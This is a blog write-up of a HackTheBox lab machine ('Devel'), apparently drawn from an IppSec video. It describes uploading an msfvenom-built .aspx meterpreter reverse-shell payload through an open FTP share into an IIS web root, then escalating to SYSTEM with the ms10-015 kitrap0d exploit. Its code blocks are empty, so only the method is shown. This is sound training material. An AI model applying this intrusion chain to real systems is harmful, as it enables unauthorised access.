Disassembly of IppSec’s youtube video HackTheBox - Devel. Windows box which is completely done within metasploit and the standard commands you would use to enumerate a box and interact. Great metasploit refresher.
Legal Usage: The information provided by execute@will is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.
By continued reading, you acknowledge the aforementioned user risks/responsibilities.
This series of write-up will contain comprehensive write-ups of hackthebox machines. In an effort to sharpen reporting techniques and help solidify the understand and methodologies used during penetration testing.
Enumeration
nmap scan:
1 |
|
(results)
FTP is open which is interesting and normal http is quite normal
navigate to web-server
The default login page exists for IIS, further investigating the image file name we see its labeled “welcome.png” which is a file name that was enumerated in the FTP
checking out the /isstart.htm
which is the main index page:
the HTTP server is most likely in the same directory as the FTP server.
ftp to open port
1 |
|
create a test file locally
1 |
|
“put” file on the ftp
1 |
|
file uploaded successfully to the ftp server.
viewing uploaded file
Noticing that when the file is accessed via the web-server if the file name doesn’t have an extension the server gives a 404 error.
if the test extention is changed to an test.html
a 200 response is returned.
1 |
|
upload
1 |
|
returns the 200 response an displays the text.html
Burp Suite
Keep in mind that IIS servers do execute code normally .asp
or .aspx
file extentions.
intercept request with burp
intercepted request sent over to repeater (ctrl+r)
web server is report IIS 7.5
which is Windows 7 and Windows Server 2008 R2. Thought process is that *.asp*
is based off VBS and .aspx
is based off .NET Framework, which is more likely in this case.
msfvenom
1 |
|
flags that will be used: -p = payload -f = format -o = output
list msfvenom payloads
1 |
|
being cognizant of the type of payload chosen as 32-bit and 64-bit do not match.
list msfvenom formats
1 |
|
setup payload
1 |
|
This created an aspx file that will load meterpreter
viewing file created:
1 |
|
referred to as the magic!
upload payload
on the FTP server
1 |
|
load msfconsole/listener
1 |
|
1 |
|
set payload:
1 |
|
set LHOST to local ip address
1 |
|
recreating payload with host/port
when the payload was created without the LHOST and LPORT
1 |
|
re-upload to ftp server
1 |
|
navigate to payload
response:
interpreter shell connection was created.
Metasploit interaction with shell
To interact with shell
1 |
|
first step:
1 |
|
check architecture check which is an x86
1 |
|
normally would say the hotfixes installed but in this case it says N/A which could mean this machine has never been updated. Keep in mide the boot time, and Service Pack
metasploit exploit suggester
background current shell and search for suggest
1 |
|
use local_exploit_suggester
1 |
|
set session to current session:
1 |
|
1 |
|
since this box hasn’t been updated since release with a release date of 2009 selecting any of the returned vulnerable exploits might work.
Choosing the first exploit ms10-015 kitrap0d
1 |
|
1 |
|
1 |
|
since we didnt set a payload metasploit opted to use *windows/meterpreter/reverse_tcp*
which is not configured correctly to the LHOST and LPORT
1 |
|
an error occured and the box crashed so he re did all the step to this point and re-ran the exploit
connect to shell
1 |
|
operating at nt authority/system!
#HAILippsec
If you don’t know who IppSec is check him out at:
Youtube: https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA Twitter: https://twitter.com/ippsec